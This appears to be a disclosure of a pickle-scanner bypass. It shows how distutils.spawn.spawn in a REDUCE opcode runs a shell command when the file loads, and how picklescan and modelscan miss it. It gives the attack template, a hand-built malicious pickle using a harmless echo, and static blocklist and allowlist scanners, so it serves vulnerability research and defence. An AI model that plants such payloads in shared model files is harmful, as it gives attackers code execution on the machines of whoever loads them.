Pickle Scanner Bypass: distutils.spawn.spawn
RCE via deprecated stdlib distutils.spawn.spawn()
Bypasses both picklescan v1.0.4 and modelscan v0.8.8.
The deprecated distutils.spawn.spawn() function internally calls subprocess.Popen(cmd).wait(), so a pickle whose REDUCE opcode resolves this function and hands it an attacker-chosen argv executes that command as soon as the file is loaded. Neither scanner includes distutils.spawn in its unsafe-module list, so both report the file as clean.
Usage
python3 -c "import pickle; pickle.load(open('malicious.pkl', 'rb'))"
# /tmp/MFV_PWNED will be created
Technical Details
- Module: distutils.spawn (stdlib; deprecated since Python 3.10, removed in 3.12)
- Function: distutils.spawn.spawn()
- Attack: distutils.spawn.spawn(['bash', '-c', 'your_command_here'])
- Detection: picklescan v1.0.4: not detected | modelscan v0.8.8: not detected

distutils.spawn is a separate module from distutils.file_util, which is in picklescan's blocklist; a blocklist entry for one does not cover the other. Because distutils left the stdlib in 3.12, the payload fires on 3.11 and earlier, or on newer interpreters where setuptools installs its distutils shim so the import still resolves.
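The following is an added example, not code from the model card or from either scanner. It hand-assembles a protocol-4 pickle with the same shape as the payload described above (STACK_GLOBAL resolving distutils.spawn.spawn, REDUCE with an argv list; the command is a harmless echo), then statically disassembles it with pickletools.genops, which never executes anything. It shows why a blocklist that names distutils.file_util but not distutils.spawn lets the file through, and how an allowlist of modules a checkpoint is expected to import flags it instead. The blocklist and allowlist contents are illustrative assumptions, not the scanners' real configuration, and the string-tracking for STACK_GLOBAL is the simplification picklers' output permits (module and name are the two most recent string constants).

```python
import pickle
import pickletools


def _short_binunicode(s: str) -> bytes:
    """Encode a str as a SHORT_BINUNICODE opcode (protocol 4, length < 256)."""
    enc = s.encode("utf-8")
    if len(enc) >= 256:
        raise ValueError("SHORT_BINUNICODE only carries strings shorter than 256 bytes")
    return b"\x8c" + bytes([len(enc)]) + enc


# Constructed for this example: a pickle that, if loaded, would call
# distutils.spawn.spawn(['bash', '-c', 'echo pwned']). Never pass it to pickle.load().
MALICIOUS_PICKLE = (
    b"\x80\x04"                                   # PROTO 4
    + _short_binunicode("distutils.spawn")        # module name
    + _short_binunicode("spawn")                  # attribute name
    + b"\x93"                                     # STACK_GLOBAL -> distutils.spawn.spawn
    + b"]("                                       # EMPTY_LIST, MARK
    + _short_binunicode("bash")
    + _short_binunicode("-c")
    + _short_binunicode("echo pwned")
    + b"e"                                        # APPENDS -> ['bash', '-c', 'echo pwned']
    + b"\x85"                                     # TUPLE1  -> (argv,)
    + b"R"                                        # REDUCE  -> spawn(argv) at load time
    + b"."                                        # STOP
)

# Benign pickle for contrast (constructed; a real checkpoint would reference torch globals).
BENIGN_PICKLE = pickle.dumps({"weights": [1, 2, 3]}, protocol=4)

STRING_OPS = {"UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Return every (module, name) the loader would import, by static disassembly.

    GLOBAL (protocol <= 3) carries "module name" in its argument; STACK_GLOBAL
    (protocol 4+) consumes the two string constants pushed just before it.
    """
    found = []
    strings = []  # string constants seen so far; STACK_GLOBAL takes the last two
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif op.name == "STACK_GLOBAL":
            if len(strings) < 2:
                raise ValueError("STACK_GLOBAL without two preceding string constants")
            name = strings.pop()
            module = strings.pop()
            found.append((module, name))
        elif op.name in STRING_OPS:
            strings.append(arg)
    return found


def blocklist_scan(data: bytes, unsafe_modules: set[str]) -> list[tuple[str, str]]:
    """Blocklist approach: report only imports from modules already known to be dangerous."""
    return [(m, n) for m, n in referenced_globals(data) if m in unsafe_modules]


def allowlist_scan(data: bytes, allowed_modules: set[str]) -> list[tuple[str, str]]:
    """Allowlist approach: report any import from a module a checkpoint has no reason to need."""
    return [(m, n) for m, n in referenced_globals(data) if m not in allowed_modules]


# Illustrative lists (assumptions for this example, not picklescan's or modelscan's own).
EXAMPLE_BLOCKLIST = {"os", "subprocess", "distutils.file_util"}
EXAMPLE_ALLOWLIST = {"collections", "torch", "torch._utils", "numpy", "numpy.core.multiarray"}

if __name__ == "__main__":
    print("imports  :", referenced_globals(MALICIOUS_PICKLE))
    print("blocklist:", blocklist_scan(MALICIOUS_PICKLE, EXAMPLE_BLOCKLIST))   # misses it
    print("allowlist:", allowlist_scan(MALICIOUS_PICKLE, EXAMPLE_ALLOWLIST))   # flags it
```

The blocklist returns nothing for the payload because distutils.spawn is not on it, which is exactly the gap the page reports; the allowlist returns ("distutils.spawn", "spawn") because anything outside the expected set is suspicious by default. Either way, disassembling with pickletools.genops is the safe way to inspect an untrusted .pkl; pickle.load() on it is the vulnerability.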